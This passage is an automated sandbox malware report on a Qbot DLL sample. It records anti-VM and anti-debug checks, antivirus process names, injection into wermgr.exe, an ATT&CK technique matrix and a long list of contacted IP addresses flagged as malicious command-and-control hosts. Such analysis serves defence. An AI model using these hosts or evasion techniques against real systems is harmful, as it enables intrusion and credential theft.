            Source: wermgr.exe, 00000017.00000003.577054664.0000000004C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wermgr.exe, 00000017.00000003.577054664.0000000004C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wermgr.exe, 00000017.00000003.577054664.0000000004C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7312Thread sleep count: 195 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exe TID: 7548Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_16-13026
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_16-11962
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_1000B967 GetSystemInfo,16_2_1000B967
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_10009E70 FindFirstFileW,FindNextFileW,16_2_10009E70
            Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
            Source: Amcache.hve.10.drBinary or memory string: VMware
            Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
            Source: Amcache.hve.10.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
            Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.10.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
            Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
            Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.10.drBinary or memory string: VMware7,1
            Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.me
            Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
            Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6AD814B0 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,4_2_6AD814B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6AD81F50 mov eax, dword ptr fs:[00000030h]4_2_6AD81F50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_10001015 mov eax, dword ptr fs:[00000030h]16_2_10001015
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_100021CD mov eax, dword ptr fs:[00000030h]16_2_100021CD
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ADC5370 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,EnterCriticalSection,TlsGetValue,GetLastError,TlsGetValue,GetLastError,LeaveCriticalSection,4_2_6ADC5370

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: BF0000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: BC0000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 1023C50Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: BC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: BF0000 protect: page read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: BC0000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ADB3D50 cpuid 4_2_6ADB3D50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6ADC52A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_6ADC52A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_1000BC31 GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW,16_2_1000BC31
            Source: rundll32.exe, 00000010.00000003.569127742.000000000110F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
            Source: rundll32.exe, 00000010.00000003.569127742.000000000110F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
            Source: rundll32.exe, 00000010.00000003.569127742.000000000110F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
            Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: rundll32.exe, 00000010.00000003.569127742.000000000110F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
            Source: rundll32.exe, 00000010.00000003.569127742.000000000110F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
            Source: rundll32.exe, 00000010.00000003.569127742.000000000110F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.rundll32.exe.6c0960.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.rundll32.exe.6c0960.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000010.00000002.576923753.0000000001090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.576802227.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.rundll32.exe.6c0960.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.rundll32.exe.6c0960.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000010.00000002.576923753.0000000001090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.576802227.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts3
            Native API
            1
            DLL Side-Loading
            311
            Process Injection
            1
            Masquerading
            1
            Credential API Hooking
            1
            System Time Discovery
            Remote Services1
            Credential API Hooking
            Exfiltration Over Other Network Medium11
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            1
            Input Capture
            121
            Security Software Discovery
            Remote Desktop Protocol1
            Input Capture
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)311
            Process Injection
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares1
            Archive Collected Data
            Automated Exfiltration2
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Rundll32
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer113
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            Remote System Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync24
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 880549 Sample: distantly.dat.dll Startdate: 02/06/2023 Architecture: WINDOWS Score: 100 33 103.212.19.254 VNET-ASVNETNETWORKSPVTLTDIN India 2->33 35 184.63.133.131 VIASAT-SP-BACKBONEUS United States 2->35 37 94 other IPs or domains 2->37 47 Found malware configuration 2->47 49 Yara detected Qbot 2->49 51 Sigma detected: Execute DLL with spoofed extension 2->51 53 3 other signatures 2->53 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 9->11         started        14 cmd.exe 1 9->14         started        16 rundll32.exe 9->16         started        18 8 other processes 9->18 signatures6 55 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 11->55 57 Writes to foreign memory regions 11->57 59 Allocates memory in foreign processes 11->59 61 Injects a PE file into a foreign processes 11->61 20 wermgr.exe 11->20         started        23 rundll32.exe 14->23         started        25 WerFault.exe 4 11 16->25         started        27 WerFault.exe 2 9 18->27         started        29 WerFault.exe 9 18->29         started        process7 dnsIp8 39 85.101.239.116, 443, 49715 TTNETTR Turkey 20->39 41 new-fp-shed.wg1.b.yahoo.com 87.248.100.215, 443, 49714 YAHOO-IRDGB United Kingdom 20->41 45 2 other IPs or domains 20->45 31 WerFault.exe 20 9 23->31         started        43 192.168.2.1 unknown unknown 25->43 process9

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            distantly.dat.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;0%URL Reputationsafe
            https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;0%URL Reputationsafe
            https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&c0%Avira URL Cloudsafe
            https://openweb.jac.yahoosandbox.com/1.5.0/jac.js0%Avira URL Cloudsafe
            https://openweb.jac.yahoosandbox.com0%Avira URL Cloudsafe
            https://openweb.jac.yahoosandbox.com0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            new-fp-shed.wg1.b.yahoo.com
            87.248.100.215
            truefalse
              high
              yahoo.com
              74.6.143.25
              truefalse
                high
                www.yahoo.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://yahoo.com/false
                    high
                    https://www.yahoo.com/false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://s.yimg.com/ss/rapid-3.53.38.jsG00CXZJV.htm.23.drfalse
                        high
                        https://s.yimg.com/aaq/vzm/cs_1.4.0.jsG00CXZJV.htm.23.drfalse
                          high
                          https://s.yimg.com/cx/pv/perf-vitals_3.1.0.jsG00CXZJV.htm.23.drfalse
                            high
                            https://s.yimg.com/aaq/spotim/G00CXZJV.htm.23.drfalse
                              high
                              https://s.yimg.com/uu/api/res/1.2/27maLpkTB93XzaI1prBLfg--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHBG00CXZJV.htm.23.drfalse
                                high
                                https://s.yimg.com/uu/api/res/1.2/0ROULHQQc0kxU0JgsNkFew--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHBG00CXZJV.htm.23.drfalse
                                  high
                                  https://fp-graviton-home-gateway.media.yahoo.com/G00CXZJV.htm.23.drfalse
                                    high
                                    http://upx.sf.netAmcache.hve.10.drfalse
                                      high
                                      https://s.yimg.com/uu/api/res/1.2/7mz1gUykvPcUcalzuGE1WQ--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHBG00CXZJV.htm.23.drfalse
                                        high
                                        https://openweb.jac.yahoosandbox.comG00CXZJV.htm.23.drfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://s.yimg.com/uc/sf/0.1.322/js/safe.min.jsG00CXZJV.htm.23.drfalse
                                          high
                                          https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;G00CXZJV.htm.23.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://s.yimg.com/uu/api/res/1.2/nDSzKTzruwlGWD3tTOyQ6Q--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHBG00CXZJV.htm.23.drfalse
                                            high
                                            https://www.yahoo.com/px.gifG00CXZJV.htm.23.drfalse
                                              high
                                              https://s.yimg.com/uu/api/res/1.2/WPRptIkensEKSkqnDF0zXQ--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHBG00CXZJV.htm.23.drfalse
                                                high
                                                https://search.yahoo.com/search?p=G00CXZJV.htm.23.drfalse
                                                  high
                                                  https://5.ras.yahoo.com/adcount%7C2.0%7C5113.1%7C4830441%7C0%7C225%7CAdId=11101911;BnId=2;ct=2751814G00CXZJV.htm.23.drfalse
                                                    high
                                                    http://schema.orgG00CXZJV.htm.23.drfalse
                                                      high
                                                      http://www.opensource.org/licenses/mit-license.phpG00CXZJV.htm.23.drfalse
                                                        high
                                                        https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;G00CXZJV.htm.23.drfalse
                                                          high
                                                          https://s.yimg.com/aaq/wf/wf-core-1.63.0.jsG00CXZJV.htm.23.drfalse
                                                            high
                                                            https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&cG00CXZJV.htm.23.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://s.yimg.com/uu/api/res/1.2/DPoM7IMoctMoJZibhnSBMw--~B/Zmk9c3RyaW07aD0zODg7cT05NTt3PTcyMDthcHBG00CXZJV.htm.23.drfalse
                                                              high
                                                              https://s.yimg.com/uu/api/res/1.2/DL.jvSKx.esoBzrSPEIwfQ--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHBG00CXZJV.htm.23.drfalse
                                                                high
                                                                https://5.ras.yahoo.com/adcount%7C2.0%7C5113.1%7C4830424%7C0%7C0%7CAdId=-41;BnId=0;ct=2751814974;st=G00CXZJV.htm.23.drfalse
                                                                  high
                                                                  https://s.yimg.com/uu/api/res/1.2/EtQws8V8gUWi7Lp0u6r4vg--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHBG00CXZJV.htm.23.drfalse
                                                                    high
                                                                    https://s.yimg.com/nn/lib/metro/g/myy/advertisement_0.0.19.jsG00CXZJV.htm.23.drfalse
                                                                      high
                                                                      https://s.yimg.com/uu/api/res/1.2/mzPB3eeJrxJuAn9uOhK0cA--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHBG00CXZJV.htm.23.drfalse
                                                                        high
                                                                        https://s.yimg.com/aaq/nel/js/spotIm.custom.SpotIMJAC.modal.9d3270fa67932556c75baaed2c09c955.jsG00CXZJV.htm.23.drfalse
                                                                          high
                                                                          https://s.yimg.com/uu/api/res/1.2/tPwgVkehrxGaI0QqcXUdhg--~B/Zmk9c3RyaW07aD0xMjM7cT05NTt3PTIyMDthcHBG00CXZJV.htm.23.drfalse
                                                                            high
                                                                            https://yep.video.yahoo.com/oath/js/1/oath-player.js?ypv=8.5.43&lang=en-USG00CXZJV.htm.23.drfalse
                                                                              high
                                                                              https://s.yimg.com/aaq/hc/homepage-pwa-defer-1.1.6.jsG00CXZJV.htm.23.drfalse
                                                                                high
                                                                                https://s.yimg.com/uu/api/res/1.2/uoC01Si3ktPRn2o0u7VdqQ--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHBG00CXZJV.htm.23.drfalse
                                                                                  high
                                                                                  https://s.yimg.com/uu/api/res/1.2/0Cxuyu407OTaz_.ZyoovkA--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHBG00CXZJV.htm.23.drfalse
                                                                                    high
                                                                                    https://openweb.jac.yahoosandbox.com/1.5.0/jac.jsG00CXZJV.htm.23.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    38.2.18.164
                                                                                    unknownUnited States
                                                                                    174COGENT-174UStrue
                                                                                    2.82.8.80
                                                                                    unknownPortugal
                                                                                    3243MEO-RESIDENCIALPTtrue
                                                                                    70.160.67.203
                                                                                    unknownUnited States
                                                                                    22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                    83.110.223.61
                                                                                    unknownUnited Arab Emirates
                                                                                    5384EMIRATES-INTERNETEmiratesInternetAEtrue
                                                                                    209.171.160.69
                                                                                    unknownCanada
                                                                                    852ASN852CAtrue
                                                                                    84.215.202.8
                                                                                    unknownNorway
                                                                                    41164GET-NOGETNorwayNOtrue
                                                                                    184.182.66.109
                                                                                    unknownUnited States
                                                                                    22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                    200.84.211.255
                                                                                    unknownVenezuela
                                                                                    8048CANTVServiciosVenezuelaVEtrue
                                                                                    125.99.69.178
                                                                                    unknownIndia
                                                                                    17488HATHWAY-NET-APHathwayIPOverCableInternetINtrue
                                                                                    174.4.89.3
                                                                                    unknownCanada
                                                                                    6327SHAWCAtrue
                                                                                    121.121.108.120
                                                                                    unknownMalaysia
                                                                                    9534MAXIS-AS1-APBinariangBerhadMYtrue
                                                                                    161.142.103.187
                                                                                    unknownMalaysia
                                                                                    9930TTNET-MYTIMEdotComBerhadMYtrue
                                                                                    213.64.33.92
                                                                                    unknownSweden
                                                                                    3301TELIANET-SWEDENTeliaCompanySEtrue
                                                                                    114.143.176.236
                                                                                    unknownIndia
                                                                                    17762HTIL-TTML-IN-APTataTeleservicesMaharashtraLtdINtrue
                                                                                    24.234.220.88
                                                                                    unknownUnited States
                                                                                    22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                    67.70.120.249
                                                                                    unknownCanada
                                                                                    577BACOMCAtrue
                                                                                    73.88.173.113
                                                                                    unknownUnited States
                                                                                    7922COMCAST-7922UStrue
                                                                                    72.205.104.134
                                                                                    unknownUnited States
                                                                                    22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                    117.195.17.148
                                                                                    unknownIndia
                                                                                    9829BSNL-NIBNationalInternetBackboneINtrue
                                                                                    69.160.121.6
                                                                                    unknownJamaica
                                                                                    33576DIG001JMtrue
                                                                                    176.133.4.230
                                                                                    unknownFrance
                                                                                    5410BOUYGTEL-ISPFRtrue
                                                                                    183.87.163.165
                                                                                    unknownIndia
                                                                                    132220JPRDIGITAL-INJPRDigitalPvtLtdINtrue
                                                                                    184.181.75.148
                                                                                    unknownUnited States
                                                                                    22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                    70.49.205.198
                                                                                    unknownCanada
                                                                                    577BACOMCAtrue
                                                                                    87.221.153.182
                                                                                    unknownSpain
                                                                                    12479UNI2-ASEStrue
                                                                                    70.50.1.252
                                                                                    unknownCanada
                                                                                    577BACOMCAtrue
                                                                                    85.101.239.116
                                                                                    unknownTurkey
                                                                                    9121TTNETTRtrue
                                                                                    181.4.225.225
                                                                                    unknownArgentina
                                                                                    7303TelecomArgentinaSAARtrue
                                                                                    100.4.163.158
                                                                                    unknownUnited States
                                                                                    701UUNETUStrue
                                                                                    103.141.50.43
                                                                                    unknownIndia
                                                                                    133693SKISP-AS-INSriKrishnaInternetServicesPrivateLimitedItrue
                                                                                    70.50.83.216
                                                                                    unknownCanada
                                                                                    577BACOMCAtrue
                                                                                    92.1.170.110
                                                                                    unknownUnited Kingdom
                                                                                    13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBtrue
                                                                                    64.121.161.102
                                                                                    unknownUnited States
                                                                                    6079RCN-ASUStrue
                                                                                    96.56.197.26
                                                                                    unknownUnited States
                                                                                    6128CABLE-NET-1UStrue
                                                                                    188.28.19.84
                                                                                    unknownUnited Kingdom
                                                                                    206067H3GUKGBtrue
                                                                                    125.99.76.102
                                                                                    unknownIndia
                                                                                    17488HATHWAY-NET-APHathwayIPOverCableInternetINtrue
                                                                                    81.101.185.146
                                                                                    unknownUnited Kingdom
                                                                                    5089NTLGBtrue
                                                                                    116.75.63.183
                                                                                    unknownIndia
                                                                                    17488HATHWAY-NET-APHathwayIPOverCableInternetINtrue
                                                                                    124.246.122.199
                                                                                    unknownSingapore
                                                                                    63850ENTRUSTICT-AS-APQRHUBPTYLTDTAEntrustICTAUtrue
                                                                                    147.147.30.126
                                                                                    unknownUnited Kingdom
                                                                                    6871PLUSNETUKInternetServiceProviderGBtrue
                                                                                    109.130.247.84
                                                                                    unknownBelgium
                                                                                    5432PROXIMUS-ISP-ASBEtrue
                                                                                    75.109.111.89
                                                                                    unknownUnited States
                                                                                    19108SUDDENLINK-COMMUNICATIONSUStrue
                                                                                    88.126.94.4
                                                                                    unknownFrance
                                                                                    12322PROXADFRtrue
                                                                                    124.122.47.148
                                                                                    unknownThailand
                                                                                    17552TRUE-AS-APTrueInternetCoLtdTHtrue
                                                                                    66.241.183.99
                                                                                    unknownUnited States
                                                                                    16604HUNTEL-NETUStrue
                                                                                    180.151.19.13
                                                                                    unknownIndia
                                                                                    10029SHYAMSPECTRA-ASSHYAMSPECTRAPVTLTDINtrue
                                                                                    94.204.202.106
                                                                                    unknownUnited Arab Emirates
                                                                                    15802DU-AS1AEtrue
                                                                                    47.205.25.170
                                                                                    unknownUnited States
                                                                                    5650FRONTIER-FRTRUStrue
                                                                                    95.45.50.93
                                                                                    unknownIreland
                                                                                    5466EIRCOMInternetHouseIEtrue
                                                                                    103.212.19.254
                                                                                    unknownIndia
                                                                                    132956VNET-ASVNETNETWORKSPVTLTDINtrue
                                                                                    85.61.165.153
                                                                                    unknownSpain
                                                                                    12479UNI2-ASEStrue
                                                                                    91.160.70.68
                                                                                    unknownFrance
                                                                                    12322PROXADFRtrue
                                                                                    87.248.100.215
                                                                                    new-fp-shed.wg1.b.yahoo.comUnited Kingdom
                                                                                    34010YAHOO-IRDGBfalse
                                                                                    201.143.215.69
                                                                                    unknownMexico
                                                                                    8151UninetSAdeCVMXtrue
                                                                                    184.63.133.131
                                                                                    unknownUnited States
                                                                                    7155VIASAT-SP-BACKBONEUStrue
                                                                                    203.109.44.236
                                                                                    unknownIndia
                                                                                    135777NECONN-ASShreenortheastConnectAndServicesPvtLtdINtrue
                                                                                    90.104.151.37
                                                                                    unknownFrance
                                                                                    3215FranceTelecom-OrangeFRtrue
                                                                                    201.244.108.183
                                                                                    unknownColombia
                                                                                    19429ETB-ColombiaCOtrue
                                                                                    2.49.63.160
                                                                                    unknownUnited Arab Emirates
                                                                                    5384EMIRATES-INTERNETEmiratesInternetAEtrue
                                                                                    103.42.86.42
                                                                                    unknownIndia
                                                                                    133660EDIGITAL-ASE-InfrastructureandEntertainmentIndiaPvtLttrue
                                                                                    80.6.50.34
                                                                                    unknownUnited Kingdom
                                                                                    5089NTLGBtrue
                                                                                    175.156.217.7
                                                                                    unknownSingapore
                                                                                    4773MOBILEONELTD-AS-APMobileOneLtdMobileInternetServicePrtrue
                                                                                    103.139.242.6
                                                                                    unknownIndia
                                                                                    138798MUTINY-AS-INMutinySystemsPrivateLimitedINtrue
                                                                                    27.0.48.233
                                                                                    unknownIndia
                                                                                    132573SAINGN-AS-INSAINGNNetworkServicesINtrue
                                                                                    70.28.50.223
                                                                                    unknownCanada
                                                                                    577BACOMCAtrue
                                                                                    173.17.45.60
                                                                                    unknownUnited States
                                                                                    30036MEDIACOM-ENTERPRISE-BUSINESSUStrue
                                                                                    81.229.117.95
                                                                                    unknownSweden
                                                                                    3301TELIANET-SWEDENTeliaCompanySEtrue
                                                                                    70.64.77.115
                                                                                    unknownCanada
                                                                                    6327SHAWCAtrue
                                                                                    87.252.106.39
                                                                                    unknownItaly
                                                                                    48544TECNOADSL-ASITtrue
                                                                                    79.77.142.22
                                                                                    unknownUnited Kingdom
                                                                                    9105TISCALI-UKTalkTalkCommunicationsLimitedGBtrue
                                                                                    98.163.227.79
                                                                                    unknownUnited States
                                                                                    22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                    93.187.148.45
                                                                                    unknownUnited Kingdom
                                                                                    8680SURE-INTERNATIONAL-LIMITEDGBtrue
                                                                                    186.75.95.6
                                                                                    unknownPanama
                                                                                    11556CableWirelessPanamaPAtrue
                                                                                    50.68.186.195
                                                                                    unknownCanada
                                                                                    6327SHAWCAtrue
                                                                                    45.62.70.33
                                                                                    unknownCanada
                                                                                    40440NRTC-CAtrue
                                                                                    83.249.198.100
                                                                                    unknownSweden
                                                                                    39651COMHEM-SWEDENSEtrue
                                                                                    12.172.173.82
                                                                                    unknownUnited States
                                                                                    2386INS-ASUStrue
                                                                                    47.199.241.39
                                                                                    unknownUnited States
                                                                                    5650FRONTIER-FRTRUStrue
                                                                                    79.168.224.165
                                                                                    unknownPortugal
                                                                                    2860NOS_COMUNICACOESPTtrue
                                                                                    199.27.66.213
                                                                                    unknownUnited States
                                                                                    40608HCTNEBRASKAUStrue
                                                                                    200.44.198.47
                                                                                    unknownVenezuela
                                                                                    8048CANTVServiciosVenezuelaVEtrue
                                                                                    176.142.207.63
                                                                                    unknownFrance
                                                                                    5410BOUYGTEL-ISPFRtrue
                                                                                    86.173.2.12
                                                                                    unknownUnited Kingdom
                                                                                    2856BT-UK-ASBTnetUKRegionalnetworkGBtrue
                                                                                    45.62.75.250
                                                                                    unknownCanada
                                                                                    40440NRTC-CAtrue
                                                                                    92.154.17.149
                                                                                    unknownFrance
                                                                                    3215FranceTelecom-OrangeFRtrue
                                                                                    90.29.86.138
                                                                                    unknownFrance
